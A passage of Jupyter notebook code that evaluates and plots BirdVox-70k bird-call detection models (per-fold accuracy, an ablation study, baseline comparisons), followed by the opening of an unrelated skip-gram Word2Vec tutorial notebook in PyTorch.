xtick_strs.append("{:2d}".format(int(xtick)))
else:
xtick_strs.append("{:1.1f}".format(xtick))
print(xtick_strs)
plt.gca().set_xticklabels(xtick_strs, family="serif")
plt.xlim([np.log2(xticks[0]), np.log2(22.0)])
errs = np.zeros((len(model_names), 6))
for fold_id in range(6):
errs[:, fold_id] =\
np.log2(100 - np.array([np.median(fold_accs[fold_id][name]) for name in model_names]))
#ys = [1, 2, 4, 5, 7, 8, 11, 12, 14, 15, 17, 18]
ys = [1, 2, 3, 5, 6, 7, 10, 11, 12, 14, 15, 16]
for i in range(len(model_names)):
plt.plot(errs[i, fold_id], ys[i], 'o', color=colors[fold_id]);
ytick_dict = {
"icassp-convnet": " logmelspec ",
"icassp-convnet_aug-all-but-noise": "GDA ➡ logmelspec ",
##
"icassp-ntt-convnet": " logmelspec ➡ MoE",
"icassp-ntt-convnet_aug-all-but-noise": "GDA ➡ logmelspec ➡ MoE",
##
"icassp-add-convnet": " logmelspec ➡ AT ",
"icassp-add-convnet_aug-all-but-noise": "GDA ➡ logmelspec ➡ AT ",
###
###
"pcen-convnet": " PCEN ",
"pcen-convnet_aug-all-but-noise": "GDA ➡ PCEN ",
##
"pcen-ntt-convnet": " PCEN ➡ MoE",
"pcen-ntt-convnet_aug-all-but-noise": "GDA ➡ PCEN ➡ MoE",
##
"pcen-add-convnet": " PCEN ➡ AT ",
"pcen-add-convnet_aug-all-but-noise": "GDA ➡ PCEN ➡ AT ",
}
plt.yticks(ys)
plt.gca().set_yticklabels([ytick_dict[m] for m in model_names], family="monospace")
plt.xlabel("Per-fold validation error rate (%)", family="serif")
plt.gca().spines['left'].set_visible(False)
plt.gca().spines['top'].set_visible(False)
plt.gca().spines['right'].set_visible(False)
plt.gca().grid(linestyle="--")
plt.savefig('fig_per-fold-validation.svg', bbox_inches="tight")
np.sum(pareto > 0, axis=1)
n_val_trials = 1
model_names = [
"icassp-convnet", "icassp-convnet_aug-all-but-noise", "icassp-convnet_aug-all",
"icassp-ntt-convnet", "icassp-ntt-convnet_aug-all-but-noise", "icassp-ntt-convnet_aug-all",
"pcen-convnet", "pcen-convnet_aug-all-but-noise", "pcen-convnet_aug-all",
"icassp-add-convnet", "icassp-add-convnet_aug-all-but-noise", "icassp-add-convnet_aug-all",
"pcen-add-convnet", "pcen-add-convnet_aug-all-but-noise", "pcen-add-convnet_aug-all",
"pcen-ntt-convnet_aug-all-but-noise", "pcen-ntt-convnet_aug-all",
"pcen-addntt-convnet_aug-all-but-noise",
]
n_models = len(model_names)
model_val_accs = {}
model_test_accs = {}
# Loop over models.
for model_id, model_name in enumerate(model_names):
model_dir = os.path.join(models_dir, model_name)
model_val_accs[model_name] = np.zeros((6,))
model_test_accs[model_name] = np.zeros((6,))
for test_unit_id in range(6):
# TRIAL SELECTION
test_unit_str = units[test_unit_id]
test_unit_dir = os.path.join(model_dir, test_unit_str)
val_accs = []
for trial_id in range(n_trials):
trial_str = "trial-" + str(trial_id)
trial_dir = os.path.join(test_unit_dir, trial_str)
history_name = "_".join([
dataset_name,
model_name,
test_unit_str,
trial_str,
"history.csv"
])
history_path = os.path.join(
trial_dir, history_name)
try:
history_df = pd.read_csv(history_path)
val_acc = max(history_df["Validation accuracy (%)"])
except:
val_acc = 0.0
val_accs.append(val_acc)
val_accs = np.array(val_accs)
trial_id = np.argmax(val_accs)
# VALIDATION SET EVALUATION
trial_str = "trial-" + str(trial_id)
trial_dir = os.path.join(test_unit_dir, trial_str)
fns, fps, tns, tps = [], [], [], []
validation_units = localmodule.fold_units()[test_unit_id][2]
for val_unit_str in validation_units:
predictions_name = "_".join([
dataset_name,
model_name,
"test-" + test_unit_str,
trial_str,
"predict-" + val_unit_str,
"clip-predictions.csv"
])
prediction_path = os.path.join(
trial_dir, predictions_name)
# Load prediction.
with open(prediction_path, 'r') as f:
reader = csv.reader(f)
rows = list(reader)
rows = [",".join(row) for row in rows]
rows = rows[1:]
rows = "\n".join(rows)
# Parse rows with correct header.
df = pd.read_csv(StringIO(rows),
names=[
"Dataset",
"Test unit",
"Prediction unit",
"Timestamp",
"Center Freq (Hz)",
"Augmentation",
"Key",
"Ground truth",
"Predicted probability"])
y_pred = np.array(df["Predicted probability"])
y_pred = (y_pred > 0.5).astype('int')
# Load ground truth.
y_true = np.array(df["Ground truth"])
# Compute confusion matrix.
tn, fp, fn, tp = sklearn.metrics.confusion_matrix(
y_true, y_pred).ravel()
tns.append(tn)
fps.append(fp)
fns.append(fn)
tps.append(tp)
tn = sum(tns)
tp = sum(tps)
fn = sum(fns)
fp = sum(fps)
val_acc = 100 * (tn+tp) / (tn+tp+fn+fp)
model_val_accs[model_name][test_unit_id] = val_acc
# TEST SET EVALUATION
trial_dir = os.path.join(
test_unit_dir, trial_str)
predictions_name = "_".join([
dataset_name,
model_name,
"test-" + test_unit_str,
trial_str,
"predict-" + test_unit_str,
"clip-predictions.csv"
])
prediction_path = os.path.join(
trial_dir, predictions_name)
# Load prediction.
with open(prediction_path, 'r') as f:
reader = csv.reader(f)
rows = list(reader)
rows = [",".join(row) for row in rows]
rows = rows[1:]
rows = "\n".join(rows)
# Parse rows with correct header.
df = pd.read_csv(StringIO(rows),
names=[
"Dataset",
"Test unit",
"Prediction unit",
"Timestamp",
"Center Freq (Hz)",
"Augmentation",
"Key",
"Ground truth",
"Predicted probability"])
y_pred = np.array(df["Predicted probability"])
y_pred = (y_pred > 0.5).astype('int')
# Load ground truth.
y_true = np.array(df["Ground truth"])
# Compute confusion matrix.
tn, fp, fn, tp = sklearn.metrics.confusion_matrix(
y_true, y_pred).ravel()
test_acc = 100 * (tn+tp) / (tn+tp+fn+fp)
model_test_accs[model_name][test_unit_id] = test_acc
model_names
model_diagrams = {
"icassp-convnet": " melspec -> log ",
"icassp-convnet_aug-all-but-noise": " geom -> melspec -> log ",
"icassp-convnet_aug-all": "(noise + geom) -> melspec -> log ",
"icassp-ntt-convnet": " melspec -> log -> NTT ",
"icassp-ntt-convnet_aug-all-but-noise": " geom -> melspec -> log -> NTT ",
"icassp-ntt-convnet_aug-all": "(noise + geom) -> melspec -> log -> NTT ",
"pcen-convnet": " melspec -> PCEN ",
"pcen_convnet_aug-all-but-noise": " geom -> melspec -> PCEN ",
"pcen-convnet_aug-all": "(noise + geom) -> melspec -> PCEN ",
"icassp-add-convnet": " melspec -> log -> CONCAT",
"icassp-add-convnet_aug-all-but-noise": " geom -> melspec -> log -> CONCAT",
"icassp-add-convent_aug-all": "(noise + geom) -> melspec -> log -> CONCAT",
"pcen-add-convnet": " melspec -> PCEN -> CONCAT",
"pcen-add-convnet_aug-all-but-noise": " geom -> melspec -> PCEN -> CONCAT",
"pcen-add-convnet_aug-all": "(noise + geom) -> melspec -> PCEN -> CONCAT",
"pcen-ntt-convnet_aug-all-but-noise": " geom -> melspec -> PCEN -> NTT ",
"pcen-ntt-convnet_aug-all": "(noise + geom) -> melspec -> PCEN -> NTT ",
"pcen-addntt-convnet_aug-all": "(noise + geom) -> melspec -> PCEN -> AFFINE"}
plt.figure(figsize=(9, 6))
plt.rcdefaults()
fig, ax = plt.subplots()
plt.boxplot(np.stack(model_val_accs.values()).T, 0, 'rs', 0)
#plt.ylim((-5.0, 1.0))
plt.setp(ax.get_yticklabels(), family="serif")
ax.set_yticklabels(model_names)
plt.gca().invert_yaxis()
ax.set_xlabel('Accuracy (%)')
ax.set_title('BirdVox-70k validation set')
plt.show()
plt.figure(figsize=(9, 6))
plt.rcdefaults()
fig, ax = plt.subplots()
plt.boxplot(np.stack(model_test_accs.values()).T, 0, 'rs', 0)
#plt.ylim((-5.0, 1.0))
plt.setp(ax.get_yticklabels(), family="serif")
ax.set_yticklabels(model_names)
plt.gca().invert_yaxis()
ax.set_xlabel('Accuracy (%)')
ax.set_title('BirdVox-70k test set')
plt.show()
model_test_accs
ablation_reference_name = "pcen-add-convnet_aug-all-but-noise"
ablation_names = [x for x in list(model_val_accs.keys()) if x not in
["icassp-add-convnet_aug-all",
ablation_reference_name,
"icassp-ntt-convnet",
"pcen-addntt-convnet_aug-all-but-noise"]]
ablation_names = list(reversed(ablation_names))
ytick_dict = {
"icassp-convnet": " logmelspec ",
"icassp-convnet_aug-all-but-noise": "GDA -> logmelspec ",
"icassp-convnet_aug-all": "ADA -> logmelspec ",
##
"icassp-ntt-convnet": " logmelspec -> MoE",
"icassp-ntt-convnet_aug-all-but-noise": "GDA -> logmelspec -> MoE",
"icassp-ntt-convnet_aug-all": "ADA -> logmelspec -> MoE",
##
"icassp-add-convnet": " logmelspec -> AT ",
"icassp-add-convnet_aug-all-but-noise": "GDA -> logmelspec -> AT ",
"icassp-add-convnet_aug-all": "ADA -> logmelspec -> AT ",
###
###
"pcen-convnet": " PCEN ",
"pcen-convnet_aug-all-but-noise": "GDA -> PCEN ",
"pcen-convnet_aug-all": "ADA -> PCEN ",
##
"pcen-ntt-convnet": " PCEN -> MoE",
"pcen-ntt-convnet_aug-all-but-noise": "GDA -> PCEN -> MoE",
"pcen-ntt-convnet_aug-all": "GDA -> PCEN -> MoE",
##
"pcen-add-convnet": " PCEN -> AT ",
"pcen-add-convnet_aug-all-but-noise": "GDA -> PCEN -> AT ",
"pcen-add-convnet_aug-all": "ADA -> PCEN -> AT ",
###
"pcen-addntt-convnet_aug-all-but-noise":"GDA -> PCEN -> AT + MoE ",
}
reference_val_accs = model_val_accs[ablation_reference_name]
ablation_val_accs = [
100 * (reference_val_accs - model_val_accs[name]) / (100 - reference_val_accs)
for name in ablation_names]
ablation_names = list(reversed([ablation_names[i] for i in np.argsort(np.median(ablation_val_accs,axis=1))]))
ablation_val_accs = list(reversed([ablation_val_accs[i] for i in np.argsort(np.median(ablation_val_accs,axis=1))]))
ablation_val_accs = np.array(ablation_val_accs)
plt.rcdefaults()
fig, ax = plt.subplots(figsize=(8, 6))
plt.grid(linestyle="--")
plt.axvline(0.0, linestyle="--", color="#009900")
plt.plot([0.0], [1+len(ablation_val_accs)], 'd',
color="#009900", markersize=10.0)
colors = [
"#CB0003", # RED
"#E67300", # ORANGE
"#990099", # PURPLE
"#0000B2", # BLUE
"#009900", # GREEN
# '#008888', # TURQUOISE
# '#888800', # KAKI
'#555555', # GREY
]
plt.boxplot(ablation_val_accs.T, 0, 'rs', 0,
whis=100000, patch_artist=True, boxprops={"facecolor": "w"})
for i, color in enumerate(colors):
plt.plot(np.array(ablation_val_accs[:,i]),
range(1, 1+len(ablation_val_accs[:,i])), 'o', color=color)
fig.canvas.draw()
plt.setp(ax.get_yticklabels(), family="serif")
#ax.set_yticklabels([
# "adaptive threshold\nreplaced by\n mixture of experts",
# "no data augmentation",
# "addition of noise\nto frontend but not to\nauxiliary features",
# "no context adaptation",
# "PCEN\nreplaced by\nlog-mel frontend",
# "state of the art [X]"])
ax.set_yticks(range(1, 2+len(ablation_val_accs)))
ax.set_yticklabels([ytick_dict[x] for x in
(ablation_names + [ablation_reference_name])], family="monospace")
plt.gca().invert_xaxis()
plt.gca().invert_yaxis()
ax.set_xlabel('Relative difference in validation miss rate (%)', family="serif")
plt.ylim([0.5, 1.5+len(ablation_names)])
plt.show()
reference_test_accs = model_test_accs[ablation_reference_name]
print(reference_test_accs)
baseline_test_accs = model_test_accs["icassp-convnet_aug-all"]
print(baseline_test_accs)
plt.savefig('fig_exhaustive-per-fold-validation.eps', bbox_inches="tight")
plt.savefig('fig_exhaustive-per-fold-validation.png', bbox_inches="tight", dpi=1000)
%matplotlib inline
ablation_reference_name = "pcen-add-convnet_aug-all-but-noise"
#ablation_names = [x for x in list(model_val_accs.keys()) if x not in
# ["icassp-add-convnet_aug-all",
# ablation_reference_name,
# "icassp-ntt-convnet",
# "pcen-addntt-convnet_aug-all-but-noise"]]
ablation_names = [
"pcen-ntt-convnet_aug-all-but-noise",
"pcen-add-convnet",
"pcen-add-convnet_aug-all",
"pcen-convnet_aug-all-but-noise",
"icassp-convnet_aug-all-but-noise",
"icassp-convnet_aug-all"
]
ablation_names = list(reversed(ablation_names))
ytick_dict = {
"icassp-convnet": " logmelspec ",
"icassp-convnet_aug-all-but-noise": "GDA -> logmelspec ",
"icassp-convnet_aug-all": "ADA -> logmelspec ",
##
"icassp-ntt-convnet": " logmelspec -> MoE",
"icassp-ntt-convnet_aug-all-but-noise": "GDA -> logmelspec -> MoE",
"icassp-ntt-convnet_aug-all": "ADA -> logmelspec -> MoE",
##
"icassp-add-convnet": " logmelspec -> AT ",
"icassp-add-convnet_aug-all-but-noise": "GDA -> logmelspec -> AT ",
"icassp-add-convnet_aug-all": "ADA -> logmelspec -> AT ",
###
###
"pcen-convnet": " PCEN ",
"pcen-convnet_aug-all-but-noise": "GDA -> PCEN ",
"pcen-convnet_aug-all": "ADA -> PCEN ",
##
"pcen-ntt-convnet": " PCEN -> MoE",
"pcen-ntt-convnet_aug-all-but-noise": "GDA -> PCEN -> MoE",
"pcen-ntt-convnet_aug-all": "GDA -> PCEN -> MoE",
##
"pcen-add-convnet": " PCEN -> AT ",
"pcen-add-convnet_aug-all-but-noise": "GDA -> PCEN -> AT ",
"pcen-add-convnet_aug-all": "ADA -> PCEN -> AT ",
###
"pcen-addntt-convnet_aug-all-but-noise":"GDA -> PCEN -> AT + MoE ",
}
reference_val_accs = model_val_accs[ablation_reference_name]
ablation_val_accs = [
100 * (reference_val_accs - model_val_accs[name]) / (100 - reference_val_accs)
for name in ablation_names]
ablation_names = list(reversed([ablation_names[i] for i in np.argsort(np.median(ablation_val_accs,axis=1))]))
ablation_val_accs = list(reversed([ablation_val_accs[i] for i in np.argsort(np.median(ablation_val_accs,axis=1))]))
ablation_val_accs = np.array(ablation_val_accs)
plt.rcdefaults()
fig, ax = plt.subplots(figsize=(7, 4))
plt.grid(linestyle="--")
plt.axvline(0.0, linestyle="--", color="#009900")
plt.plot([0.0], [1+len(ablation_val_accs)], 'd',
color="#009900", markersize=10.0)
colors = [
"#CB0003", # RED
"#E67300", # ORANGE
"#990099", # PURPLE
"#0000B2", # BLUE
"#009900", # GREEN
# '#008888', # TURQUOISE
# '#888800', # KAKI
'#555555', # GREY
]
for i, color in enumerate(colors):
plt.plot(np.array(ablation_val_accs[:,i]),
range(1, 1+len(ablation_val_accs[:,i])), 'o', color=color)
fig.canvas.draw()
plt.boxplot(ablation_val_accs.T, 0, 'rs', 0,
whis=100000)
plt.setp(ax.get_yticklabels(), family="serif")
ax.set_yticklabels(reversed([
"BirdVoxDetect",
"adaptive threshold\nreplaced by\n mixture of experts",
"no data augmentation",
"addition of noise\nto frontend but not to\nauxiliary features",
"no context adaptation",
"PCEN\nreplaced by\nlog-mel frontend",
"previous state of the art [57]"]))
ax.set_yticks(range(1, 2+len(ablation_val_accs)))
#ax.set_yticklabels([ytick_dict[x] for x in
# (ablation_names + [ablation_reference_name])], family="monospace")
plt.gca().invert_xaxis()
plt.gca().invert_yaxis()
ax.set_xlabel('Relative difference in validation miss rate (%)', family="serif")
plt.ylim([0.5, 1.5+len(ablation_names)])
#plt.show()
reference_test_accs = model_test_accs[ablation_reference_name]
print(reference_test_accs)
baseline_test_accs = model_test_accs["icassp-convnet_aug-all"]
print(baseline_test_accs)
plt.savefig('fig_ablation-study.eps', bbox_inches="tight")
plt.savefig('fig_ablation-study.svg', bbox_inches="tight")
plt.savefig('fig_ablation-study.png', bbox_inches="tight", dpi=1000)
2
n_trials = 10
report = {}
for model_name in model_names:
model_dir = os.path.join(models_dir, model_name)
# Initialize dictionaries
model_report = {
"validation": {},
"test_cv-acc_th=0.5": {}
}
# Initialize matrix of validation accuracies.
val_accs = np.zeros((n_units, n_trials))
val_tps = np.zeros((n_units, n_trials))
val_tns = np.zeros((n_units, n_trials))
val_fps = np.zeros((n_units, n_trials))
val_fns = np.zeros((n_units, n_trials))
test_accs = np.zeros((n_units, n_trials))
test_tps = np.zeros((n_units, n_trials))
test_tns = np.zeros((n_units, n_trials))
test_fps = np.zeros((n_units, n_trials))
test_fns = np.zeros((n_units, n_trials))
# Loop over test units.
for test_unit_id, test_unit_str in enumerate(units):
# Define directory for test unit.
test_unit_dir = os.path.join(model_dir, test_unit_str)
# Retrieve fold such that unit_str is in the test set.
folds = localmodule.fold_units()
fold = [f for f in folds if test_unit_str in f[0]][0]
test_units = fold[0]
validation_units = fold[2]
# Loop over trials.
for trial_id in range(n_trials):
# Define directory for trial.
trial_str = "trial-" + str(trial_id)
trial_dir = os.path.join(test_unit_dir, trial_str)
# Initialize.
break_switch = False
val_fn = 0
val_fp = 0
val_tn = 0
val_tp = 0
# Loop over validation units.
for val_unit_str in validation_units:
predictions_name = "_".join([
dataset_name,
model_name,
"test-" + test_unit_str,
"trial-" + str(trial_id),
"predict-" + val_unit_str,
"clip-predictions.csv"
])
prediction_path = os.path.join(
trial_dir, predictions_name)
# Load prediction.
csv_file = pd.read_csv(prediction_path)
# Parse prediction.
if model_name == "icassp-convnet_aug-all":
y_pred = np.array(csv_file["Predicted probability"])
y_true = np.array(csv_file["Ground truth"])
elif model_name == "pcen-add-convnet_aug-all-but-noise":
with open(prediction_path, 'r') as f:
reader = csv.reader(f)
rows = list(reader)
rows = [",".join(row) for row in rows]
rows = rows[1:]
rows = "\n".join(rows)
# Parse rows with correct header.
df = pd.read_csv(StringIO(rows),
names=[
"Dataset",
"Test unit",
"Prediction unit",
"Timestamp",
"Center Freq (Hz)",
"Augmentation",
"Key",
"Ground truth",
"Predicted probability"])
y_pred = np.array(df["Predicted probability"])
y_true = np.array(df["Ground truth"])
# Threshold.
y_pred = (y_pred > 0.5).astype('int')
# Check that CSV file is not corrupted.
if len(y_pred) == 0:
break_switch = True
break
# Compute confusion matrix.
tn, fp, fn, tp = sklearn.metrics.confusion_matrix(
y_true, y_pred).ravel()
val_fn = val_fn + fn
val_fp = val_fp + fp
val_tn = val_tn + tn
val_tp = val_tp + tp
if not break_switch:
val_acc = (val_tn+val_tp) / (val_fn+val_fp+val_tn+val_tp)
else:
val_fn = 0
val_fp = 0
val_tn = 0
val_tp = 0
val_acc = 0.0
val_fns[test_unit_id, trial_id] = val_fn
val_fps[test_unit_id, trial_id] = val_fp
val_tns[test_unit_id, trial_id] = val_tn
val_tps[test_unit_id, trial_id] = val_tp
val_accs[test_unit_id, trial_id] = val_acc
# Initialize.
predictions_name = "_".join([
dataset_name,
model_name,
"test-" + test_unit_str,
"trial-" + str(trial_id),
"predict-" + test_unit_str,
"clip-predictions.csv"
])
prediction_path = os.path.join(
trial_dir, predictions_name)
with open(prediction_path, 'r') as f:
reader = csv.reader(f)
rows = list(reader)
rows = [",".join(row) for row in rows]
rows = rows[1:]
rows = "\n".join(rows)
# Parse rows with correct header.
df = pd.read_csv(StringIO(rows),
names=[
"Dataset",
"Test unit",
"Prediction unit",
"Timestamp",
"Center Freq (Hz)",
"Augmentation",
"Key",
"Ground truth",
"Predicted probability"])
y_pred = np.array(df["Predicted probability"])
y_pred = (y_pred > 0.5).astype('int')
y_true = np.array(df["Ground truth"])
# Check that CSV file is not corrupted.
if len(y_pred) == 0:
test_tn, test_fp, test_fn, test_tp = 0, 0, 0, 0
test_acc = 0.0
else:
# Load ground truth.
y_true = np.array(df["Ground truth"])
# Compute confusion matrix.
test_tn, test_fp, test_fn, test_tp =\
sklearn.metrics.confusion_matrix(
y_true, y_pred).ravel()
test_acc = (test_tn+test_tp) / (test_fn+test_fp+test_tn+test_tp)
test_fns[test_unit_id, trial_id] = test_fn
test_fps[test_unit_id, trial_id] = test_fp
test_tns[test_unit_id, trial_id] = test_tn
test_tps[test_unit_id, trial_id] = test_tp
test_accs[test_unit_id, trial_id] = test_acc
model_report["validation"]["FN"] = test_fn
model_report["validation"]["FP"] = test_fp
model_report["validation"]["TN"] = test_tn
model_report["validation"]["TP"] = test_tp
model_report["validation"]["accuracy"] = val_accs
best_trials = np.argsort(model_report["validation"]["accuracy"], axis=1)
model_report["validation"]["best_trials"] = best_trials
model_report["test_cv-acc_th=0.5"]["FN"] = test_fns
model_report["test_cv-acc_th=0.5"]["FP"] = test_fps
model_report["test_cv-acc_th=0.5"]["TN"] = test_tns
model_report["test_cv-acc_th=0.5"]["TP"] = test_tps
model_report["test_cv-acc_th=0.5"]["accuracy"] = test_accs
cv_accs = []
for eval_trial_id in range(5):
cv_fn = 0
cv_fp = 0
cv_tn = 0
cv_tp = 0
for test_unit_id, test_unit_str in enumerate(units):
best_trials = model_report["validation"]["best_trials"]
unit_best_trials = best_trials[test_unit_id, -5:]
unit_best_trials = sorted(unit_best_trials)
trial_id = unit_best_trials[eval_trial_id]
cv_fn = cv_fn + model_report["test_cv-acc_th=0.5"]["FN"][test_unit_id, trial_id]
cv_fp = cv_fp + model_report["test_cv-acc_th=0.5"]["FP"][test_unit_id, trial_id]
cv_tn = cv_tn + model_report["test_cv-acc_th=0.5"]["TN"][test_unit_id, trial_id]
cv_tp = cv_tp + model_report["test_cv-acc_th=0.5"]["TP"][test_unit_id, trial_id]
cv_acc = (cv_tn+cv_tp) / (cv_tn+cv_tp+cv_fn+cv_fp)
cv_accs.append(cv_acc)
model_report["test_cv-acc_th=0.5"]["global_acc"] = np.array(cv_accs)
report[model_name] = model_report
print(model_name, ": acc = {:5.2f}% ± {:3.1f}".format(
100*np.mean(report[model_name]['test_cv-acc_th=0.5']['global_acc']),
100*np.std(report[model_name]['test_cv-acc_th=0.5']['global_acc'])))
#print(report['icassp-convnet_aug-all']['test_cv-acc_th=0.5']['global_acc'])
#print(report['pcen-add-convnet_aug-all-but-noise']['test_cv-acc_th=0.5']['global_acc'])
list(report.keys())
icassp_accs = report['icassp-convnet_aug-all']['test_cv-acc_th=0.5']['global_acc']
print("ICASSP 2018: acc = {:5.2f}% ± {:3.1f}".format(100*np.mean(icassp_accs), 100*np.std(icassp_accs)))
spl_accs = report['pcen-add-convnet_aug-all-but-noise']['test_cv-acc_th=0.5']['global_acc']
print("SPL 2018: acc = {:5.2f}% ± {:3.1f}".format(100*np.mean(spl_accs), 100*np.std(spl_accs)))
n_trials = 5
model_name = "skm-cv"
model_dir = os.path.join(models_dir, model_name)
skm_fns = np.zeros((n_trials, n_units))
skm_fps = np.zeros((n_trials, n_units))
skm_tns = np.zeros((n_trials, n_units))
skm_tps = np.zeros((n_trials, n_units))
# Loop over trials.
for trial_id in range(n_trials):
# Loop over units.
for test_unit_id, test_unit_str in enumerate(units):
# Define path to predictions.
unit_dir = os.path.join(model_dir, test_unit_str)
trial_str = "trial-" + str(5 + trial_id)
trial_dir = os.path.join(unit_dir, trial_str)
predictions_name = "_".join([
dataset_name,
"skm-proba",
"test-" + test_unit_str,
trial_str,
"predict-" + test_unit_str,
"clip-predictions.csv"
])
predictions_path = os.path.join(trial_dir, predictions_name)
# Remove header, which has too few columns (hack).
with open(predictions_path, 'r') as f:
reader = csv.reader(f)
rows = list(reader)
rows = [",".join(row) for row in rows]
rows = rows[1:]
rows = "\n".join(rows)
# Parse rows with correct header.
df = pd.read_csv(StringIO(rows),
names=[
"Dataset",
"Test unit",
"Prediction unit",
"Timestamp",
"Center Freq (Hz)",
"Augmentation",
"Key",
"Ground truth",
"Predicted probability"])
# Extract y_pred and y_true.
y_pred = np.array((df["Predicted probability"] > 0.5)).astype("int")
y_true = np.array(df["Ground truth"])
# Compute confusion matrix.
test_tn, test_fp, test_fn, test_tp =\
sklearn.metrics.confusion_matrix(
y_true, y_pred).ravel()
skm_fns[trial_id, test_unit_id] = test_fn
skm_fps[trial_id, test_unit_id] = test_fp
skm_tns[trial_id, test_unit_id] = test_tn
skm_tps[trial_id, test_unit_id] = test_tp
total_skm_fns = np.sum(skm_fns[:, 1:], axis=1)
total_skm_fps = np.sum(skm_fps[:, 1:], axis=1)
total_skm_tns = np.sum(skm_tns[:, 1:], axis=1)
total_skm_tps = np.sum(skm_tps[:, 1:], axis=1)
total_skm_accs = (total_skm_tns+total_skm_tps) / (total_skm_fns+total_skm_fps+total_skm_tns+total_skm_tps)
print("SKM: acc = {:5.2f}% ± {:3.1f}".format(100*np.mean(total_skm_accs), 100*np.std(total_skm_accs)))
xticks = np.array([2.0, 5.0, 10.0, 20.0, 50.0])
lms_snr_accs = np.repeat([0.652], 5)
pcen_snr_accs = np.repeat([0.809], 5)
skm_accs = total_skm_accs
fig, ax = plt.subplots(figsize=(10, 3))
plt.rcdefaults()
plt.boxplot(np.log2(np.array([
100*(1-lms_snr_accs),
100*(1-pcen_snr_accs),
100*(1-skm_accs),
100*(1-icassp_accs),
100*(1-spl_accs)]).T), 0, 'rs', 0,
whis=100000, patch_artist=True, boxprops={"facecolor": "w"});
plt.xlim(np.log2(np.array([2.0, 50.0])))
plt.xticks(np.log2(xticks))
plt.gca().set_xticklabels([100 - x for x in xticks])
plt.setp(ax.get_yticklabels(), family="serif")
ax.set_yticklabels(["logmelspec-SNR", "PCEN-SNR", "PCA-SKM-CNN", "logmelspec-CNN", "BirdVoxDetect"],
family="serif")
plt.gca().invert_yaxis()
plt.gca().invert_xaxis()
plt.xlabel("Test accuracy (%)", family="serif")
plt.gca().yaxis.grid(color='k', linestyle='--', linewidth=1.0, alpha=0.25, which="major")
plt.gca().xaxis.grid(color='k', linestyle='--', linewidth=1.0, alpha=0.25, which="major")
plt.savefig('fig_per-fold-test.eps', bbox_inches="tight")
np.min(icassp_accs), np.max(icassp_accs)
np.min(spl_accs), np.max(spl_accs)
icassp_fold_accs = report['icassp-convnet_aug-all']['validation']["accuracy"]
spl_fold_accs = report['pcen-add-convnet_aug-all-but-noise']['validation']["accuracy"]
print(np.mean(np.max(icassp_fold_accs, axis=1)), np.mean(np.max(spl_fold_accs, axis=1)))
```
|
github_jupyter
|
# Skip-gram Word2Vec
In this notebook, I'll lead you through using PyTorch to implement the [Word2Vec algorithm](https://en.wikipedia.org/wiki/Word2vec) using the skip-gram architecture. By implementing this, you'll learn about embedding words for use in natural language processing. This will come in handy when dealing with things like machine translation.
## Readings
Here are the resources I used to build this notebook. I suggest reading these either beforehand or while you're working on this material.
* A really good [conceptual overview](http://mccormickml.com/2016/04/19/word2vec-tutorial-the-skip-gram-model/) of Word2Vec from Chris McCormick
* [First Word2Vec paper](https://arxiv.org/pdf/1301.3781.pdf) from Mikolov et al.
* [Neural Information Processing Systems, paper](http://papers.nips.cc/paper/5021-distributed-representations-of-words-and-phrases-and-their-compositionality.pdf) with improvements for Word2Vec also from Mikolov et al.
---
## Word embeddings
When you're dealing with words in text, you end up with tens of thousands of word classes to analyze; one for each word in a vocabulary. Trying to one-hot encode these words is massively inefficient because most values in a one-hot vector will be set to zero. So, the matrix multiplication that happens in between a one-hot input vector and a first, hidden layer will result in mostly zero-valued hidden outputs.
To solve this problem and greatly increase the efficiency of our networks, we use what are called **embeddings**. Embeddings are just a fully connected layer like you've seen before. We call this layer the embedding layer and the weights are embedding weights. We skip the multiplication into the embedding layer by instead directly grabbing the hidden layer values from the weight matrix. We can do this because the multiplication of a one-hot encoded vector with a matrix returns the row of the matrix corresponding the index of the "on" input unit.
<img src='assets/lookup_matrix.png' width=50%>
Instead of doing the matrix multiplication, we use the weight matrix as a lookup table. We encode the words as integers, for example "heart" is encoded as 958, "mind" as 18094. Then to get hidden layer values for "heart", you just take the 958th row of the embedding matrix. This process is called an **embedding lookup** and the number of hidden units is the **embedding dimension**.
There is nothing magical going on here. The embedding lookup table is just a weight matrix. The embedding layer is just a hidden layer. The lookup is just a shortcut for the matrix multiplication. The lookup table is trained just like any weight matrix.
Embeddings aren't only used for words of course. You can use them for any model where you have a massive number of classes. A particular type of model called **Word2Vec** uses the embedding layer to find vector representations of words that contain semantic meaning.
---
## Word2Vec
The Word2Vec algorithm finds much more efficient representations by finding vectors that represent the words. These vectors also contain semantic information about the words.
<img src="assets/context_drink.png" width=40%>
Words that show up in similar **contexts**, such as "coffee", "tea", and "water" will have vectors near each other. Different words will be further away from one another, and relationships can be represented by distance in vector space.
There are two architectures for implementing Word2Vec:
>* CBOW (Continuous Bag-Of-Words) and
* Skip-gram
<img src="assets/word2vec_architectures.png" width=60%>
In this implementation, we'll be using the **skip-gram architecture** with **negative sampling** because it performs better than CBOW and trains faster with negative sampling. Here, we pass in a word and try to predict the words surrounding it in the text. In this way, we can train the network to learn representations for words that show up in similar contexts.
---
## Loading Data
Next, we'll ask you to load in data and place it in the `data` directory
1. Load the [text8 dataset](https://s3.amazonaws.com/video.udacity-data.com/topher/2018/October/5bbe6499_text8/text8.zip); a file of cleaned up *Wikipedia article text* from Matt Mahoney.
2. Place that data in the `data` folder in the home directory.
3. Then you can extract it and delete the archive, zip file to save storage space.
After following these steps, you should have one file in your data directory: `data/text8`.
```
# read in the extracted text file
with open('data/text8') as f:
text = f.read()
# print out the first 100 characters
print(text[:100])
```
## Pre-processing
Here I'm fixing up the text to make training easier. This comes from the `utils.py` file. The `preprocess` function does a few things:
>* It converts any punctuation into tokens, so a period is changed to ` <PERIOD> `. In this data set, there aren't any periods, but it will help in other NLP problems.
* It removes all words that show up five or *fewer* times in the dataset. This will greatly reduce issues due to noise in the data and improve the quality of the vector representations.
* It returns a list of words in the text.
This may take a few seconds to run, since our text file is quite large. If you want to write your own functions for this stuff, go for it!
```
import utils
# get list of words
words = utils.preprocess(text)
print(words[:30])
# print some stats about this word data
print("Total words in text: {}".format(len(words)))
print("Unique words: {}".format(len(set(words)))) # `set` removes any duplicate words
```
### Dictionaries
Next, I'm creating two dictionaries to convert words to integers and back again (integers to words). This is again done with a function in the `utils.py` file. `create_lookup_tables` takes in a list of words in a text and returns two dictionaries.
>* The integers are assigned in descending frequency order, so the most frequent word ("the") is given the integer 0 and the next most frequent is 1, and so on.
Once we have our dictionaries, the words are converted to integers and stored in the list `int_words`.
```
vocab_to_int, int_to_vocab = utils.create_lookup_tables(words)
int_words = [vocab_to_int[word] for word in words]
print(int_words[:30])
```
